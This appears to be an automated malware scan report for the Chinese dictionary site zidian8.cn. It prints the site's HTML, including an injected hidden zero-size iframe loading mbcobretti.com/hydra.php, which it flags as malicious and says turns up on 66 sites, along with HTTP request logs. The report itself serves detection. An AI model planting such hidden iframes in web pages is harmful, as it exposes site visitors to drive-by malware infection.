Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zidian8.cn
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zidian8.cn/ | 200 OK Content-Length: 4718 Content-Type: text/html | malicious |
Page code contains blacklisted domain: mbcobretti.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title> 字典词典在线 </title></head>
<body><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe>
<form name="form1" method="post" action="Default.aspx" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPD
...[4892 bytes skipped]...
Malicious iFrame found. The same iFrame was found in 66 websites.
size: 0x0
src: http://mbcobretti.com/hydra.php
This URL is marked by Google as suspicious
<iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter>
http://zidian8.cn/WebResource.axd?d=PbbSuRInp9dFvcyAIX7Ki4cOsHKkfwzznEAvtShKBjyVK6LZqYMplJq_XryMcaG8skjek0k7Z2mY1y-6wk9defvozXY1&t=635359416454687500 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19495 Content-Type: text/javascript | clean |
http://zidian8.cn/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zidian8.cn
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 27 Jan 2015 23:49:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 4718
Content-Type: text/html; charset=gb2312
Set-Cookie: .ASPXANONYMOUS=SJT2tx1x0AEkAAAAMWY1ODQ0ZjItMjc5NS00ZjMyLWE1ZTQtMGMzYzAwYTAzZmMy0; expires=Tue, 07-Apr-2015 10:29:24 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...4718 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zidian8.cn
Referer: http://www.google.com/search?q=zidian8.cn
Result:
The result is similar to the first query. There are no suspicious redirects found.